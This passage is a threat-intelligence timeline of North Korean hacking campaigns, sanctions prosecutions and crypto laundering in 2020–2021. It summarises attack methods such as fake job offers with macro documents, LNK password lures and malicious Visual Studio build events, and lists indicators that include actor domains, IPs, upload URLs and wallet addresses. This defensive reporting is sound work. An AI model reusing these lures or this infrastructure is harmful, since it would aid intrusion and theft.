The complaint lists one source of the laundered funds as a DPRK entitity involved in the banned sales of North Korean coal. The laundered funds were used to purchase Russian pretroleum products and nuclear and missile components for the DPRK and to aid multiple cover branches of the DPRK’s Foreign Trade bank, which the U.S. Treasury Department had sanctioned for facilitating transactions on behalf of actors linked to the DPRK’s proliferation network. Indicators::

Operation DreamJob: Espionage Campaign Targetting Govt and Defense Co's

Date:: 2020-08-13 URL:: https://clearskysec.com/operation-dream-job/ https://clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf Tags:: Operation DreamJob Details::

Widespread North Korean Espionage Campaign
It succeeded in infecting several dozens of companies and organizations in Israel and globally
Main targets: defense, governmental companies, and specific employees of those companies
We assess this to be this year’s main offensive campaign by the Lazarus group
The infection and infiltration of target systems had been carried out through a widespread and sophisticated social engineering campaign, which included: reconnaissance, creation of fictitious LinkedIn profiles, sending emails to the targets’ personal addresses, and conducting a continuous dialogue with the target – directly on the phone, and over WhatsApp
Upon infection, the attackers collected intelligence regarding the company’s activity, and also its financial affairs, probably in order to try and steal some money from it
The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country. Indicators::

DPRK-aligned threat actor targeting cryptocurrency vertical with global hacking campaign

Date:: 2020-08-25 URL:: https://f-secure.com/en/press/p/dprk-aligned-threat-actor-targeting-cryptocurrency-vertical-with https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical https://otx.alienvault.com/pulse/5f453929b07a627ecdfd9af9 Tags:: Dangerous Password, CryptoCore Details::

1driv[.]org
al6z[.]org
antlercap[.]com
blockchaincap[.]org
bourncap[.]com
cloudfiles[.]club
dnsupdate[.]best
docsend[.]email
drivegoogles[.]com
enginecapital[.]cc
googledrive[.]download
googledrive[.]email
googledrive[.]online
googleexplore[.]net
idgcapital[.]org
msupdatepms[.]xyz
onedrivems[.]online
sequoiacapitals[.]com
sequoiacaps[.]com
swisscryptotokens[.]email
twosigma[.]best
twosigmateam[.]cc
twosigmateam[.]info Indicators::

CISA: Report FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks

Date:: 2020-08-26 URL:: https://cisa.gov/news-events/cybersecurity-advisories/aa20-239a Tags:: Details::

MAR 10301706-1.v1: North Korean Remote Access Tool: ECCENTRICBANDWAGON
MAR 10301706-2.v1: North Korean Remote Access Tool: VIVACIOUSGIFT
MAR 10257062-1.v2: North Korean Remote Access Tool: FASTCASH for Windows
CISA, the Department of the Treasury, FBI, and U.S. Cyber Command released a joint Technical Alert and three MARs on the North Korean government’s ATM cash-out scheme—referred to by the U.S. Government as FASTCash. Indicators::

US DOJ: Forfeiture Complaint for 280 Crypto addresses tied to North Korea

Date:: 2020-08-28 URL:: https://blog.chainalysis.com/reports/lazarus-group-north-korea-doj-complaint-august-2020/ https://justice.gov/usao-dc/pr/united-states-files-complaint-forfeit-280-cryptocurrency-accounts-tied-hacks-two Tags:: Details::

These actors stole millions of dollars’ worth of cryptocurrency and ultimately laundered the funds through Chinese over-the-counter (OTC) cryptocurrency traders. Indicators::

Yang Ban Corporation Pleads Guilty to Money Laundering

Date:: 2020-08-31 URL:: https://justice.gov/opa/pr/company-pleads-guilty-money-laundering-violation-part-scheme-circumvent-north-korean https://nknews.org/2020/09/company-pleads-guilty-to-helping-north-korea-illegally-use-us-banking-system Tags:: Details::

From at least February 2017 to May 2018 and beyond, Yang Ban deceived banks in the U.S. into processing transactions for North Korean customers of Yang Ban.
It used front companies and created false sets of invoices and shipping records to conceal that the ultimate destination of shipments were customers in the DPRK. These practices helped Yang Ban circumvent banks’ sanction and anti-money laundering filters thus duping U.S. correspondent banks into processing U.S. dollar transactions that they would not otherwise have authorized.
Yang Ban specifically admitted to conspiring with SINSMS (a company subsequently designated by U.S. sanctions) and others, to conceal the North Korean nexus by falsifying shipping records and by other means.
The company will pay a financial penalty totaling $673,714 (USD) and has agreed to implement rigorous internal controls and to cooperate fully with the Justice Department, including by reporting any criminal conduct by an employee. Indicators::

Phrma Company Espionage Attacks

Date:: 2020-09-01 URL:: https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/lazarus-recruitment Tags:: Details::

An employee of the pharmaceutical company received a document named GD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00).
After a short period of time, another employee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date: 2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on their home computers
In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.
At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.
The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.
In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn Messages, Telegram, WhatsApp, and corporate email. Indicators::

Chainalysis: report regarding Lazarus Group on-chain activity and the recent US DOJ civil forfeiture of 280 cryptocurrency addresses

Date:: 2020-09-02 URL:: https://blog.chainalysis.com/reports/lazarus-group-north-korea-doj-complaint-august-2020 Tags:: Money Laundering Details:: Indicators::

Report on Lazarus Group's targeting of crypto companies

Date:: 2020-09-02 URL:: https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf Tags:: Dangerous Password, CryptoCore Details::

It includes malware indicators, techniques and tactics Indicators::
103.5.124[.]94
103.95.99[.]3
114.113.63[.]130
1driv[.]org
66.181.166[.]15
75.146.197[.]161
95.0.200[.]212
al6z[.]org
antlercap[.]com
azcloud.jetos[.]com
blockchaincap[.]org
bourncap[.]com
check[.]onedrvdn[.]co
chromeupdate[.]publicvm[.]com
client[.]cloudocs[.]space
client[.]googleapis[.]online
cloud[.]blockchaintransparency[.]institute
cloud[.]bugscrowd[.]com
cloudfiles[.]club
cloudssl[.]dns-cloud[.]net
code[.]publicvm[.]com
cryptofund[.]servehttp[.]com
cryptostore[.]publicvm[.]com
dnsupdate[.]best
doc[.]uploadsfiles[.]xyz
docs[.]gmaildrives[.]top
docs[.]googledrives[.]info
docs[.]sendspace[.]buzz
docsend[.]email
down[.]onedrivrshares[.]xyz
down_01fcd_fff[.]googldocs[.]org
download[.]gdriveupload[.]site
download[.]showprice[.]xyz
downloadsvc[.]publicvm[.]com
downurl[.]icu
drive[.]gogleshare[.]xyz
drive[.]publicvm[.]com
drivegoogle[.]publicvm[.]com
drivegoogles[.]com
drivegooglshare[.]xyz
drives[.]googldrive[.]xyz
drives[.]googlecloud[.]live
drverify[.]dns-cloud[.]net
enginecapital[.]cc
eu[.]euprotect[.]net
europasec[.]dnsabr[.]com
F-Secure.com | © F-Secure LABS 17
ff[.]upfilees[.]xyz
file[.]onedrivecloud[.]store
gbackup[.]gogleshare[.]xyz
gdocs[.]googleupload[.]info
gdrvshare[.]onedrvshare[.]host
gethelp[.]best
googledrive[.]download
googledrive[.]email
googledrive[.]network
googledrive[.]online
googledrive[.]publicvm[.]com
googleexplore[.]net
googleupdate[.]publicvm[.]com
icloud-mail[.]net
idgcapital[.]org
Initial Access Domains/IP
IPblog[.]cloudsecure[.]space
luisgarcia[.]myftp[.]org
mail[.]gdriveupload[.]info
mail[.]gmaildrive[.]site
mail[.]googleupload[.]info
map[.]navicheck[.]xyz
matrix-partners[.]theworkpc[.]com
microsoft-update10v[.]amazonaws1[.]info
mse[.]theworkpc[.]com
mskpupdate[.]publicvm[.]com
msupdatepms[.]xyz
name[.]ownemail[.]me
office[.]onedriveglobal[.]com
onedrive[.]onedriveglobal[.]com
onedrivems[.]online
onedriveupdate[.]publicvm[.]com
open[.]gdriveshareslink[.]xyz
p2p[.]downefile[.]xyz
pp[.]fcloudshare[.]xyz
reghelp[.]webredirect[.]org
robugnito[.]publicvm[.]com
scloud[.]wechart[.]org
sendgrid[.]webredirect[.]org
sequoiacapitals[.]com
sequoiacaps[.]com
sfile[.]onedrivecloud[.]store
share[.]goglesheet[.]com
share[.]googlefiledrive[.]com
share[.]onedriveglobal[.]com
share[.]onedrvfile[.]site
sshare[.]onedriveglobal[.]com
st[.]decurret[.]site
store[.]onedriveglobal[.]com
support[.]gdrvcheck[.]co
swisscryptotokens[.]email
toyota-ai[.]org
twosigma[.]best
twosigma[.]linkpc[.]net
twosigma[.]publicvm[.]com
twosigma[.]theworkpc[.]com
twosigmateam[.]cc
twosigmateam[.]info
waterm.publicvm[.]com

Secret documents show how North Korea launders money through U.S. banks

Date:: 2020-09-20 URL:: https://nbcnews.com/news/world/secret-documents-show-how-north-korea-launders-money-through-u-n1240329 Tags:: Details:: Indicators::

US DOJ: Lazarus Group developed multiple malicious crypto applications from March 2018 through at least September 2020

Date:: 2020-09-20 URL:: https://justice.gov/usao-cdca/press-release/file/1367721/dl?inline= Tags:: Applejeus Details::

Celas Trade Pro, Worldbit-bot, icryptofx, Union Crypto Trader, Kupay Wallet, Coingo Trade, Dorusio, Cryptoneuro Trader, and Ants2whale. Indicators::

NTT Security: Unveiling The Cryptomimic

Date:: 2020-10-02 URL:: https://vblocalhost.com/uploads/VB2020-Takai-etal.pdf Tags:: DangerousPassword, CryptoMimic Details::

CryptoMimic, the APT attack group we are chasing, is an actor also known as Dangerous Password, CageyChameleon and Leery Turtle.
Cabbage RAT
Interestingly, there were no attacks on Sundays.
CryptoMimic seems to go to great lengths to avoid providing the malicious file to third parties other than original target.
The download URL for the Zip file sent to the target becomes invalid promptly. Files including the Zip file are supplied by
leveraging a redirect from the website the group prepared to a cloud service such as OneDrive, but redirecting is available
for only two or three days.
The downloaded Zip file includes a document file, such as .doc or .pdf, and a LNK file. In many cases, the name of the LNK file is something like ‘Password.txt.lnk’. Because the document file is password protected (Figure 3), the user is fooled into opening the LNK file to check the password, which initiates the attack.
As the attack goes on, CryptoMimic sends a RAT called Cabbage RAT, written in VBScript in stages. In its early stage, it checks the target’s environment. To be more specific, Cabbage RAT-B collects and sends the system and task information of its working environment to the C&C server. If CryptoMimic doesn’t judge it as an attractive target, the attack won’t go any further. Indicators::

CISA: Report on North Korean Advanced Persistent Threat Focus: Kimsuky

Date:: 2020-10-27 URL:: https://cisa.gov/news-events/cybersecurity-advisories/aa20-301a Tags:: Kimsuky Details::

CISA, FBI, and the U.S. Cyber Command Cyber National Mission Force (CNMF) released a new Joint Cybersecurity Advisory on TTPs used by North Korean APT group Kimsuky. Indicators::

NukeSped Lazarus supply-chain attack in South Korea

Date:: 2020-11-16 URL:: https://welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/ Tags:: Details::

WIZVERA VeraPort, referred to as an integration installation program, is a South Korean application that helps manage such additional security software.
The initial dropper is a console application that requires parameters, executing the next stages in a cascade and utilizes an encryption, cf. the watering hole attacks against Polish and Mexican banks
The final payload is a RAT module, with TCP communications and its commands indexed by 32-bit integers, cf. KillDisk in Central America
Many tools delivered via this chain are already flagged as NukeSped by ESET software. For example, the signed Downloader in the Analysis section is based on a project called WinHttpClient and it leads to the similar tool with hash 1EA7481878F0D9053CCD81B4589CECAEFC306CF2, which we link with with a sample from Operation Blockbuster (CB818BE1FCE5393A83FBFCB3B6F4AC5A3B5B8A4B). The connection between the latter two is the dynamic resolution of Windows APIs where the names are XOR-encrypted by 0x23, e.g., dFWwLHFMjMELQNBWJLM is the encoding of GetTokenInformation. Indicators::

Exposing the Financial Footprints of North Korea’s Hackers

Date:: 2020-11-18 URL:: https://cnas.org/publications/reports/exposing-the-financial-footprints-of-north-koreas-hackers Tags:: Details::

North Korea conducts intricate and sweeping cyberattacks against the United States and its allies to acquire funds to support its illicit nuclear proliferation efforts. Unlike more economically advanced nuclear states possessing domestic research, development, and deployment capacities to establish weapon of mass destruction (WMD) programs, the Democratic People’s Republic of Korea (DPRK) must seek financial resources, assistance, and institutional knowledge, at least initially, from overseas. It has developed its cyber capabilities in order to circumvent financial sanctions and global safeguards, conducting elaborate online bank heists and hacking attacks; stealing funds through fraudulent bank transfers, Society for Worldwide Interbank Financial Telecommunications (SWIFT) transactions, and ATM cash-outs; launching ransomware attacks demanding payment in cryptocurrency; and hacking cryptocurrency exchanges. The scale and sophistication of these innovative sanctions evasion tactics create a challenge that calls for stronger measures to confront them. In addition to providing policy recommendations for U.S. leadership and financial institutions, this report will outline the ways North Korea supports, expands, and utilizes cyber operations to acquire funds for its nuclear weapons program. Indicators::

North Korean hackers targeted COVID vaccine maker AstraZeneca

Date:: 2020-11-27 URL:: https://reuters.com/article/uk-healthcare-coronavirus-astrazeneca-no/exclusive-suspected-north-korean-hackers-targeted-covid-vaccine-maker-astrazeneca-sources-idUKKBN28719Y Tags:: Details:: Indicators::

OFAC Cyber-related Designations

Date:: 2020-12-08 URL:: https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20201208 Tags:: Details:: Indicators::

Greetings from Lazarus: Pharma Company Espionage Attacks

Date:: 2020-12-15 URL:: https://www.hvs-consulting.de/public/ThreatReport-Lazarus.pdf Tags:: Details::

Stayed in their systems for months on end
Contacted in Feb 2020
Payload delivered in Q2/Q3
Data exif Q2 Q3 Q4 2020
By using spear-phishing methods, members of Lazarus Group acted as health officials and reached out to a number of pharmaceutical companies. Once trust was gained, Lazarus Group sent a number of malicious links to the companies. It is unconfirmed what the goal of the attack was, but it is suspected that they were looking to sell data for profit, extort the companies and their employees, and give foreign entities access to proprietary COVID-19 Research. Indicators::

2021

Chainalysis Report: North Korean Hackers Crypto Holdings Reach All-time High

Date:: 2021-01-01 URL:: https://go.chainalysis.com/rs/503-FAP-074/images/Crypto-Crime-Report-2022.pdf Tags:: Money Laundering Details::

North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400M worth of digital assets last year.
These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected hot wallets into DPRK-controlled addresses.
Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out. These complex tactics and techniques have led many security researchers to characterize cyber actors for the Democratic People’s Republic of Korea (DPRK) as advanced persistent threats (APTs). This is especially true for APT 38, also known as Lazarus Group, which is led by DPRK’s primary intelligence agency, the USand UN-sanctioned Reconnaissance General Bureau.
While we will refer to the attackers as North Korean-linked hackers more generally, many of these attacks were carried out by the Lazarus Group in particular. Lazarus Group first gained notoriety from its Sony Pictures and WannaCry cyberattacks, but it has since concentrated its efforts on cryptocurrency crime—a strategy that has proven immensely profitable.
From 2018 on, the group has stolen and laundered massive sums of virtual currencies every year, typically in excess of $200M. The most successful individual hacks, one on KuCoin and another on an unnamed cryptocurrency exchange, each netted more than $250M alone.
Interestingly, in terms of dollar value, Bitcoin now accounts for less than one fourth of the cryptocurrencies stolen by DPRK.
In 2021, only 20% of the stolen funds were Bitcoin, whereas 22% were either ERC-20 tokens or altcoins. And for the first time ever, Ether accounted for a majority of the funds stolen at 58%.
The growing variety of cryptocurrencies stolen has necessarily increased the complexity of DPRK’s cryptocurrency laundering operation. Today, DPRK’s typical laundering process is as follows:
More than 65% of DPRK’s stolen funds were laundered through mixers this year, up from 42% in 2020 and 21% in 2019, suggesting that these threat actors have taken a more cautious approach with each passing year.
Why mixers? DPRK is a systematic money launderer, and their use of multiple mixers is a calculated attempt to obscure the origins of their ill-gotten cryptocurrencies while offramping into fiat. Why DeFi? DeFi platforms like DEXs provide liquidity for a wide range of ERC-20 tokens and altcoins that may not otherwise be convertible into cash. When DPRK swaps these coins for ETH or BTC they become much more liquid, and a larger variety of mixers and exchanges become usable. What’s more, DeFi platforms don’t take custody of user funds and many do not collect know-your-customer (KYC) information, meaning that cybercriminals can use these platforms without having their assets frozen or their
DPRK’s stolen fund stockpile: $170M worth of old, unlaundered cryptocurrency holdings. Chainalysis has identified $170M in current balances—representing the stolen funds of 49 separate hacks spanning from 2017 to 2021—that are controlled by North Korea but have yet to be laundered through services. The ten largest balances by dollar value are listed below.
Of DPRK’s total holdings, roughly $35M came from attacks in 2020 and 2021. By contrast, more than $55M came from attacks carried out in 2016—meaning that DPRK has massive unlaundered balances as much as six years old. Indicators::

Google TAG report on a new campaign targeting security researchers

Date:: 2021-01-25 URL:: https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ https://apnews.com/article/malware-media-north-korea-social-media-south-korea-7dc8a5a9a3576005a615524d1ba439aa Tags:: Details::

government-backed entity based in North Korea. Social media targetting.
the actors established a research blog and multiple Twitter profiles to interact with potential targets. They've used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control.
Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including guest posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains. An example of the VS Build Event can be seen in the image below.
In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn.io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
These actors have used multiple platforms to communicate with potential targets, including Twitter, LinkedIn, Telegram, Discord, Keybase and email Indicators::

ThreatNeedle

Date:: 2021-01-27 URL:: https://medium.com/s2wblog/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74 https://x.com/unpacker/status/1354203847455956995 Tags:: ThreatNeedle Details::

We already disclosed the deep analysis regarding C2 communication of ThreatNeedle at DCC 2019 and Kaspersky SAS Lightning Talk 2019. In addition, the malware and C2 communication have in common with Operation MalBus.
Additional Reference for Operation MalBus > MalBus Actor Changed Market from Google Play to ONE Store
We briefly delivers only the essential fact in Medium, and for other details, please refer to the attached PDF file which is presented at DCC and Kaspersky SAS. Indicators::

Microsoft: ZINC attacks against security researchers

Date:: 2021-01-28 URL:: https://microsoft.com/en-us/security/blog/2021/01/28/zinc-attacks-against-security-researchers/ Tags:: CVE Details::

A pre-build event with a PowerShell command was used to launch Comebacker via rundll32. This use of a malicious pre-build event is an innovative technique to gain execution.
Klackring malware
In addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a copy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The MHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further JavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the payload for further analysis.
In one instance, we discovered the actor had downloaded an old version of the Viraglt64.sys driver from the Vir.IT eXplorer antivirus. The file was dropped to the victim system as C:\Windows\System32\drivers\circlassio.sys. The actor then attempted to exploit CVE-2017-16238, described by the finder here, where the driver doesn’t perform adequate checking on a buffer it receives, which can be abused to gain an arbitrary kernel write primitive. The actor’s code however appears to be buggy and when attempting to exploit the vulnerability the exploit tried to overwrite some of the driver’s own code which crashed the victim’s machine.
Other tools used included an encrypted Chrome password-stealer hosted on ZINC domain https://codevexillium.org. The host DLL (SHA-256: ada7e80c…) was downloaded to the path C:\ProgramData\USOShared\USOShared.bin using PowerShell and then ran via rundll32. This malware is a weaponized version of CryptLib, and it decrypted the Chrome password stealer (SHA-256: 9fd0506…), which it dropped to C:\ProgramData\USOShared\USOShared.dat. Indicators::
Actor-controlled Twitter Handles
Twitter:: z055g
Twitter:: james0x40
Twitter:: mvp4p3r
Twitter:: dev0exp
Twitter:: BrownSec3Labs
Twitter:: br0vvnn
Twitter:: 0xDaria
LinkedIn:: james-williamson-55a9b81a6
LinkedIn:: guo-zhang-b152721bb
LinkedIn:: linshuang-li-aa69391bb
br0vvnn
dev0exp
henya290
james0x40
tjrim91
br0vvnn.io
blog.br0vvnn.io
codevexillium.org
angeldonationblog.com
investbooking.de
krakenfolio.com
codevexillium.org/image/download/download.asp
angeldonationblog.com/image/upload/upload.php
www.dronerc.it/shop_testbr/Core/upload.php
www.dronerc.it/forum/uploads/index.php
www.dronerc.it/shop_testbr/upload/upload.php
www.edujikim.com/intro/blue/insert.asp
investbooking.de/upload/upload.asp

Daily NK: Kim Jong Un is directly handling results of new COVID-19 hacking organization's work

Date:: 2021-02-05 URL:: https://dailynk.com/english/kim-jong-un-directly-handling-results-new-covid-19-hacking-organization-work/ Tags:: Details::

Group 325 is reportedly composed of talented members of existing hacking groups separately selected for the new organization, along with recently-hired top university graduates who majored in IT-related fields.
Their targets reportedly include major biochemistry and pharmaceutical labs, drug companies and important national administrative and intelligence bodies.
Targets not only South Korean government organizations and labs, but also major institutions in the United States and China. Indicators::

FASTCash grabs $6.1 million from BankIslami Pakistan Limited

Date:: 2021-02-17 URL:: https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and Tags:: Details:: Indicators::

FBI + CISA: Report on Operation AppleJeus Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale

Date:: 2021-02-17 URL:: https://cisa.gov/news-events/analysis-reports/ar21-048a https://us-cert.gov/ncas/analysis-reports/ar21-048a https://us-cert.gov/ncas/analysis-reports/ar21-048b https://us-cert.gov/ncas/analysis-reports/ar21-048c https://us-cert.gov/ncas/analysis-reports/ar21-048d https://us-cert.gov/ncas/analysis-reports/ar21-048e https://us-cert.gov/ncas/analysis-reports/ar21-048f https://us-cert.gov/ncas/analysis-reports/ar21-048g Tags:: Applejeus Details::

targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency
the malicious application—seen on both Windows and Mac operating systems—appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate
infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware.
Celas Trade Pro JMT Trading Union Crypto Kupay Wallet CoinGoTrade Dorusio Ants2Whale Indicators::

Ghaleb Alaumary + Ramon Abbas (Hushpuppi) named in ‘North Korean-perpetrated cyber-enabled’ heist

Date:: 2021-02-20 URL:: https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and Tags:: Details::

Nigerian Instagram celebrity Ramon Abbas, also known as Hushpuppi, has been named in another case in the United States, this time with North Korean hackers involved.
The United State Justice Department said Hushpupp conspired with a Canadian-American citizen Ghaleb Alaumary and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019.
Hushpuppi is currently facing separate trial for conspiring to launder hundreds of millions of dollars from BEC frauds and other scams.
The affidavit also alleges that Abbas conspired to launder funds stolen in a $14.7 million cyber-heist from a foreign financial institution in February 2019, in which the stolen money was sent to bank accounts around the world.
Federal prosecutors today also unsealed a charge against Ghaleb Alaumary, 37, of Mississauga, Ontario, Canada, for his role as a money launderer for the North Korean conspiracy, among other criminal schemes. Alaumary agreed to plead guilty to the charge, which was filed in the U.S. District Court in Los Angeles on Nov. 17, 2020. Alaumary was a prolific money launderer for hackers engaged in ATM cash-out schemes, cyber-enabled bank heists, business email compromise (BEC) schemes, and other online fraud schemes. Alaumary is also being prosecuted for his involvement in a separate BEC scheme by the U.S. Attorney’s Office for the Southern District of Georgia.
With respect to the North Korean co-conspirators’ activities, Alaumary organized teams of co-conspirators in the United States and Canada to launder millions of dollars obtained through ATM cash-out operations, including from BankIslami and a bank in India in 2018.
Alaumary also conspired with Ramon Olorunwa Abbas, aka Ray Hushpuppi, and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019. Last summer, the U.S. Attorney’s Office in Los Angeles charged Abbas in a separate case alleging that he conspired to launder hundreds of millions of dollars from BEC frauds and other scams. Indicators::

First North Korean National Brought to the United States to Stand Trial for Money Laundering Offenses

Date:: 2021-03-22 URL:: https://justice.gov/opa/pr/first-north-korean-national-brought-united-states-stand-trial-money-laundering-offenses https://cnbc.com/2021/03/22/north-korea-national-extradited-to-us-faces-money-laundering-charges.html https://scmp.com/news/asia/east-asia/article/3126520/north-korean-businessman-mun-chol-myong-us-court-after Tags:: Details::

According to the indictment and other court documents unsealed today, between April 2013 and November 2018, Mun and others conspired to covertly and fraudulently access the U.S. financial system. Mun is alleged to have defrauded U.S. banks and violated both U.S. and United Nations (U.N.) sanctions as part of his money laundering activities in transactions valued at over $1.5 million. The indictment further alleges that Mun was affiliated with the DPRK’s primary intelligence organization, the Reconnaissance General Bureau, which is the subject of U.S. and U.N. sanctions.
According to the indictment, Mun and his conspirators went to great lengths to avoid detection of their sanctions-busting operation. They used a web of front companies and bank accounts registered to false names and removed references to the DPRK from international wire transfer and transactional documents. By intentionally concealing that their transactions were for the benefit of DPRK entities, Mun and his conspirators deceived U.S. correspondent banks into processing U.S. dollar transactions for the benefit of DPRK entities, which the correspondent banks would have otherwise not processed.
Indicators::

A NEW NFT&DeFi TECH (PROTECTED).docx

Date:: 2021-04-11 URL:: https://x.com/fr0s7_/status/1381328726819020804 Tags:: Details::

Seems to be targeting cryptocurrency organizations Indicators::
protectoffice[.]club:443//h4H3xZIm7cP/vjQ8Kx5Bih/KuaP%2BDcd/

AppleJeus: Analysis of North Korea’s Cryptocurrency Malware

Date:: 2021-04-15 URL:: https://cisa.gov/news-events/cybersecurity-advisories/aa21-048a Tags:: Applejeus Details:: Indicators::

Lazarus BTC Changer: Back in action with JS sniffers redesigned to steal crypto

Date:: 2021-04-21 URL:: https://group-ib.com/blog/btc-changer/ Tags:: Details::

Group-IB researchers analyzed the newly discovered attacks, described the links with the clientToken= campaign, analyzed the transactions associated with the wallets controlled by the gang, and estimated Lazarus’ profits from the use of crypto-stealing JS-sniffers at 0.89993859 BTC ($8,446.55 at the moment of the transaction and $52,611 as of April 9, 2021) and 4.384719 ETH, ($9,047 as of April 9, 2021). Indicators::
0x460ab1c34e4388704c5e56e18D904Ed117D077CC
1Gf8U7UQEJvMXW5k3jtgFATWUmQXVyHkJt
1MQC6C4FVX8RhmWESWsazEb5dyDBhxH9he
1DjyE7WUCz9DLabw5EWAuJVpUzXfN4evta

The Incredible Rise of North Korea’s Hacking Army Lazarus group’s criminal enterprises including cryptocurrency exchange heists and ransomware attacks

Date:: 2021-04-26 URL:: https://newyorker.com/magazine/2021/04/26/the-incredible-rise-of-north-koreas-hacking-army Tags:: Details:: Indicators::

ClearSky: Attributing CryptoCore Attacks Against Crypto Exchanges to Lazarus

Date:: 2021-05-24 URL:: https://clearskysec.com/cryptocore-lazarus-attribution/ https://clearskysec.com/cryptocore-group/ Tags:: DangerousPassword Details::

The campaign is also known as CryptoMimic, Dangerous Password and Leery Turtle. Indicators::

ClearSky: Report on the Crypto Core APT group attributing it to the North Korean Lazarus APT

Date:: 2021-06-03 URL:: https://clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf Tags:: Details:: Indicators::

Andariel evolves to target South Korea with ransomware

Date:: 2021-06-15 URL:: https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/ Tags:: Andariel Details::

In April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection scheme and an unfamiliar payload. While we were doing our research into these findings, Malwarebytes published a nice report with technical details about the same series of attacks, which they attributed to the Lazarus group. After a deep analysis, we came to a more precise conclusion: the Andariel group was behind these attacks. Andariel was designa ted by the Korean Financial Security Institute as a sub-group of Lazarus.
Our attribution is based on the code overlaps between the second stage payload in this campaign and previous malware from the Andariel group. Apart from the code similarity, we found an additional connection with the Andariel group. Each threat actor has characteristics when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.
Mid-2020 onwards, they've leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim getting infected with custom ransomware. It adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs. Indicators::

HushPuppi The Fall Of The Billionaire Gucci Master

Date:: 2021-06-30 URL:: https://bloomberg.com/features/2021-hushpuppi-gucci-influencer/ Tags:: Money Laundering Details::

Authorities say Ramon Abbas, aka Hushpuppi, perfected a simple internet scam and laundered millions of dollars. His past says a lot about digital swagger, and the kinds of stories that get told online. Indicators::

The Lazarus Heist: Where Are They Now?

Date:: 2021-08-08 URL:: https://blog.bushidotoken.net/2021/08/the-lazarus-heist-where-are-they-now.html Tags:: Details::

The North Korean government have heavily invested in its computer network operations. From tracking North Korean APT campaigns and victim disclosure notifications over the years we can establish what North Korea's priority intelligence requirements (PIRs) are. For a semi-isolated regime that struggles to generate resources legitimately, its current set of PIRs are unsurprising. North Korea is heavily sanctioned and unable to access many things we take for granted. Organised cybercrime campaigns have become a significant and reliable way for the North Korean regime to continue existing. Indicators::

North Korean Cyberattacks: A Dangerous and Evolving Threat

Date:: 2021-09-02 URL:: https://heritage.org/asia/report/north-korean-cyberattacks-dangerous-and-evolving-threat Tags:: Details::

North Korea has conducted cyber guerrilla warfare to steal classified military secrets, absconded with billions of dollars in money and cybercurrency, held computer systems hostage, and inflicted extensive damage on computer networks. Defending against Pyongyang’s cyberattacks requires the same constant vigilance and rapidly evolving methods and techniques that law enforcement agencies had to use in response to its evasion of sanctions. The United States has taken only limited actions against North Korean hackers and foreign countries that allow them to operate and launder money from cybercrimes. Without a firm response from the U.S., the North Korean regime will continue to undermine the effectiveness of international sanctions and could inflict even greater damage during a crisis or military conflict. Indicators::

